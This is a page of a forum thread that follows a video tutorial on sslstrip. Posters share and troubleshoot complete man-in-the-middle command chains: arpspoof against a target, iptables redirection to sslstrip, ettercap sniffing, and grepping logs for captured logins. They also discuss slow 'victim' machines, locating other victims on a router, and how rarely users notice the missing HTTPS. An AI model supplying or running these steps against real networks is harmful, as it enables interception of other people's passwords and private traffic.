Page 7 of 8 FirstFirst ... 5678 LastLast
Results 61 to 70 of 79

Thread: [Video] How to: Snifff SSL / HTTPS (sslstrip)

  1. #61
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    2

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    So, I understand in principle and practice how this works... and I am aware that sslstrip offers a lock favicon to give the illusion of a secure connection. However, that lack of the HTTPS in the address bar is a dead giveaway.

    Lately, I've been playing around with Cain & Abel. Besides having a better GUI, C&A seems to be able to maintain the HTTPS as well. What I'm wondering is how does this program accomplish this and how is it different from sslstrip. On the surface, it seems to be the same type of arp poisoning mitm attack.

    Thoughts?

  2. #62
    Just burned their ISO
    Join Date
    May 2010
    Posts
    9

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    thank you for this tutorial, works perfect on my home network.

    my setup : 4 computers connected via wifi

    the only bad thing is the internet speed is terribly slow on the victim machine

    is there a way to avoid the drop of the speed ? better hardware ?

  3. #63
    Just burned his ISO f4llcon's Avatar
    Join Date
    Oct 2010
    Location
    europe
    Posts
    4

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Hello
    g0tmi1k, thank you for the great tut!

    I have a problem with the sslstip. On the victim computer it will still show up a warning when i go on hotmail.com or mail.google.com or every other https:// website.

    What am i doing wrong? I retried over and over with your tut and other tuts. But none work.

    Last night i tried it on my other computer on my other network and it worked great with

    echo 1 > /proc/sys/net/ipv4/ip_forward
    cat /proc/sys/net/ipv4/ip_forward
    arpspoof -i wlan0 -t 192.168.0.102 192.168.0.1
    iptables --flush
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    sslstrip -a -l 10000
    ettercap -T -q -i wlan0
    cat sslstrip.log | grep -a name*LIKE MSN*

    but now it does not work, so i tried your way.

    kate /etc/etter.conf
    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    sslstrip -a -k -f
    ettercap -T -q -i wlan0

    but none work now ? i will retry it when i am on my other network but why it isn't working in this network? I also tried in on one other network but there was the same problem.

    This is legal question for myself only and i am only using my own 3 networks.

    Thanks, hope to hear what's the problem.

    F4LLCON

  4. #64
    Just burned his ISO aeronavi's Avatar
    Join Date
    Oct 2010
    Location
    Portugal
    Posts
    14

    Default Re: [Video] Stripping SSL & Sniffing HTTPS (SSLStrip)

    Quote Originally Posted by g0tmi1k View Post
    Links

    Commands:
    Code:
    kate /etc/etter.conf
    >*uncomment redir_command_off in the iptables, linux section*
    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1
    
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    ettercap -T -q -i wlan0
    
    sslstrip -a -k -f
    ettercap -T -q -i wlan0
    ~g0tmi1k
    if we are using sslstrip why uncoment redir_command? that command is supposed to sniff ssl traffic and if we already using sslstrip, that will bring conflicts between the two right? Maybe because of that, many of people here are having problems with messages saying cert isnt valid (because is how redir_command works to get ssl info, from what i know).

    Also Eterrcap forwards all traffic automatically if sniffing, i dont know any command to make it stop doing that, wich means if we have ip_forward=1 and eterrcap running, we are forwarding traffic x2 times(you can confirm in wireshark). not pretty

    If i use sslstrip i do just this:

    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    sslstrip -w sslsniff.txt (so it write to file)
    then just open the file and seek for important fields, its not difficult.

    Note that to flush iptables, the command
    Code:
    iptables --flush
    will not work, (at least for me).
    You got to use
    Code:
    iptables -t nat --flush

  5. #65
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Quote Originally Posted by Warwulf View Post
    So, I understand in principle and practice how this works... and I am aware that sslstrip offers a lock favicon to give the illusion of a secure connection. However, that lack of the HTTPS in the address bar is a dead giveaway.

    Lately, I've been playing around with Cain & Abel. Besides having a better GUI, C&A seems to be able to maintain the HTTPS as well. What I'm wondering is how does this program accomplish this and how is it different from sslstrip. On the surface, it seems to be the same type of arp poisoning mitm attack.

    Thoughts?
    How is it a "dead giveaway"? I can remember seeing a video (Blackhat 2009) of the author of the software, ran a modded(*) version on Tor for 24 hours, not one person did detect the missing "S"...

    (*) = The modded version didn't record anyone personal details.
    It would only collect which URLs it was stripping, and if the user did or didn't send a request back. Every person sent the request back (to login).
    He had to check that he had it setup right because he didn't believe it was working correctly!


    Personally, I haven't used Cain & Abel too much so I can't comment that much on it, but as far as I know it an AIO GUI tool, that does HTTPS by "injects fake certificates".
    After doing a quick Google search: CAIN and ABEL Tutorial 2 | Hackers Library, it looks like they get a "pop-up dialog warning about the problem". I haven't tried this so I cant say for sure.
    It also looks like a very old version of IE that they are using....
    SSLStrip = Removes HTTPS
    Cain & Abel = Injects into HTTPS

    Cain also does the MITM attack (via ARP poisoning), were as SSLSrip doesn't do any MITM'ing, its down to the user to choose how to do the MITM (as there is more than one!)



    Quote Originally Posted by kamiz9999 View Post
    thank you for this tutorial, works perfect on my home network.

    my setup : 4 computers connected via wifi

    the only bad thing is the internet speed is terribly slow on the victim machine

    is there a way to avoid the drop of the speed ? better hardware ?
    All the traffic on all 4 computers, has to go though your computer therefore it's creating a bottle neck effect. As far as I know the only way to stop it from slowing down is to increase the bandwidth (create a bigger pipe as of such, example move from 100MB to 1GB), or attack less computers at once.



    Quote Originally Posted by f4llcon View Post
    Hello
    g0tmi1k, thank you for the great tut!

    I have a problem with the sslstip. On the victim computer it will still show up a warning when i go on hotmail.com or mail.google.com or every other https:// website.

    What am i doing wrong? I retried over and over with your tut and other tuts. But none work.

    Last night i tried it on my other computer on my other network and it worked great with

    echo 1 > /proc/sys/net/ipv4/ip_forward
    cat /proc/sys/net/ipv4/ip_forward
    arpspoof -i wlan0 -t 192.168.0.102 192.168.0.1
    iptables --flush
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    sslstrip -a -l 10000
    ettercap -T -q -i wlan0
    cat sslstrip.log | grep -a name*LIKE MSN*

    but now it does not work, so i tried your way.

    kate /etc/etter.conf
    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    sslstrip -a -k -f
    ettercap -T -q -i wlan0

    but none work now ? i will retry it when i am on my other network but why it isn't working in this network? I also tried in on one other network but there was the same problem.

    This is legal question for myself only and i am only using my own 3 networks.

    Thanks, hope to hear what's the problem.

    F4LLCON
    Are you (or is a addon - e.g. ForceTLS) going straight to a HTTPS page (https://mail.google.com)? Or is the page that is being requested forcing HTTPS (I know there is an option in Gmail to enable this)?
    SSLStrip only works if you link to a HTTPS, if the user manually types in HTTPS://, it will not work.

    Few things abot the above commands:
    > It doesn't matter which way around you do kate & echo.
    > The target ISN'T the same. Nor isn't the gateway.
    > I'm not sure if --to-ports (an extra "s" at the end) is a typo or if it matters. Its been a while, and my iptable fu isn't great.
    > SSLtrip default port is 10000, so you don't need to put it in
    > Did you try and to the last bit, "grepping" on my commands? I dunno what you're trying to sniff.



    Quote Originally Posted by aeronavi View Post
    if we are using sslstrip why uncoment redir_command? that command is supposed to sniff ssl traffic and if we already using sslstrip, that will bring conflicts between the two right? Maybe because of that, many of people here are having problems with messages saying cert isnt valid (because is how redir_command works to get ssl info, from what i know).

    Also Eterrcap forwards all traffic automatically if sniffing, i dont know any command to make it stop doing that, wich means if we have ip_forward=1 and eterrcap running, we are forwarding traffic x2 times(you can confirm in wireshark). not pretty

    If i use sslstrip i do just this:

    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    sslstrip -w sslsniff.txt (so it write to file)
    then just open the file and seek for important fields, its not difficult.

    Note that to flush iptables, the command
    Code:
    iptables --flush
    will not work, (at least for me).
    You got to use
    Code:
    iptables -t nat --flush
    Thanks for the tips aeronavi. I've got to be honest, I haven't used SSLStrip in a while, and its been even longer since I've used ettercap.
    I agree with you on ettercap enabling ip_forward (handy, but annyoying also dont know of a way to stop it when doing an MITM attack), as if you were to do:
    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    cat /proc/sys/net/ipv4/ip_forward
    1
    arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1
    cat /proc/sys/net/ipv4/ip_forward
    1
    ettercap -T -q -M ARP -i wlan0 // //
    cat /proc/sys/net/ipv4/ip_forward
    0
    *Note: that's coming from the top of my head*
    However, I was was using arpspoof to do the MITM attack, it doesn't do ip forwarding automatically, hence why I did it.
    I forgot about ettercap doing ip_forward, even when your not using it to do the MITM attack.

    The reasoning why I did redir_command, was I was showing demostrating before and after sslstrip.
    Before I ran SSLStrip, I was using HTTPS with ettercap, hence I needed redir_command.
    After running SSLStrip, I found out that I didn't need to change redir_command back.

    Short answer: Yes, that could be why some people are getting errors due to "redir_command" & "ip_forward". I'm not sure why it works for some but not others at the moment.
    People do keep getting in touch about this, and its old (also wrong as you pointed out), so I may end up doing an update to it.
    Have you...g0tmi1k?

  6. #66
    Just burned his ISO
    Join Date
    Oct 2010
    Location
    Sweden
    Posts
    4

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Absolutely great tutorial!


    Wrote earlier I was experiencing some trouble with sslstrip and the Iptables.
    NEVERMIND!
    I did forward it to --to-ports 10000
    changed it to 8080 and now it works great!

    Thanks man!

  7. #67
    Just burned his ISO
    Join Date
    May 2010
    Location
    cyberspace
    Posts
    10

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    10x man for the tutorial i rly love it easy simple and effective

  8. #68
    Just burned his ISO
    Join Date
    Jan 2011
    Posts
    1

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Thanks for great video!

    I have an problem to do this on my new NETGEAR router, all computers who ware connected to this new router gets an IP: 10.0.0.X and the router IP gateway is: 10.0.0.1

    Ettercap only find 10.0.0.1 the router default gateway when i scan, the other computers who is connect to it doesnt show up, can't find them. Why's that? Is it to good secured? How will i do to see the other victims who are connected to this router?

  9. #69
    Just burned his ISO
    Join Date
    Feb 2011
    Posts
    2

    Default Re : [Video] How to: Snifff SSL / HTTPS (sslstrip)

    First of all thanks to g0tmi1k for this amazing tutorial !

    However I was able to sniff SSL passwords without typing all these commands. All I did was uncomment the 2 lines from /etc/etter.conf then run Ettercap with ARP Poisonning. Then I was able to sniff all ssl passwords without problem. What am I doing wrong ?

    2nd question : I hacked my own network (I'm the admin) with Ettercap. Do I need do delete the fake certificates installed on the victim's computer during the test ? If I don't delete them, is it possible for a hacker who breaks into my network to "reuse" these fake certificates ? thanks.

  10. #70
    Just burned his ISO
    Join Date
    Feb 2011
    Location
    The Milky Way
    Posts
    3

    Thumbs up Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    I g0t Mi1k!
    Thanks a lot for this, took a bit of tweeking to get things going smoothly but in the end everything was peachy! Again, thank you!

    So this was my first successful 'hack', if you will! Like I said it took a bit of tweeking to get going, but any bumps I hit were because I lacked a full understanding of what I was doing... So I'm just gonna list off a couple of things I'm uncertain of.

    So I'm on my own private address space on my little LAN. Finest.
    I'm using Ettercaps GUI, to carry out the ARP spoofing. - failed on my first attempt to execute this in Shell, I'll get back to it later. For now the GUI will suffice.

    Our first command:
    Code:
    echo 1 >/proc/sys/net/ipv4/ip_forward
    What exactly is happening here? I examined the file hoping for a hint as to what this is & what it's doing - but to no avail. What kind of file is this?
    I'm taking a stab at it what this command does.
    Are we simply setting our attacking machine to allow forwarding of any IPs that we intercept?

    After that I think I understand whats happening... so ya that's all for now!
    Where should my step in security exploits be, any recommendations?

    Thanks again g0tMi1k.
    Hugs etc etc


    P.S.

    I tested this out on the following:
    Gmail
    Hotmail (Cert warning flashed up once after logon.)
    (Chrome, page layout distorted after logon)
    Vodafone.com
    warez-bb

    Browsers:
    Opera
    Chrome
    Firefox

    All was well.

Page 7 of 8 FirstFirst ... 5678 LastLast

Similar Threads

  1. Sickness - Password Sniffing with SSLStrip.
    By sickness in forum BackTrack Videos
    Replies: 35
    Last Post: 09-17-2010, 01:16 PM
  2. creating BT4 USB persistent video
    By jimmy in forum Beginners Forum
    Replies: 0
    Last Post: 02-12-2010, 11:45 PM
  3. sslstrip w/ My Wired-Wireless Network
    By MassAppeal in forum Beginners Forum
    Replies: 11
    Last Post: 02-11-2010, 05:56 AM
  4. Video Capture Software
    By sprouty in forum Beginners Forum
    Replies: 4
    Last Post: 01-25-2010, 11:16 AM
  5. sslstrip v0.7
    By Mr-Protocol in forum Tool Requests
    Replies: 2
    Last Post: 01-18-2010, 06:33 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •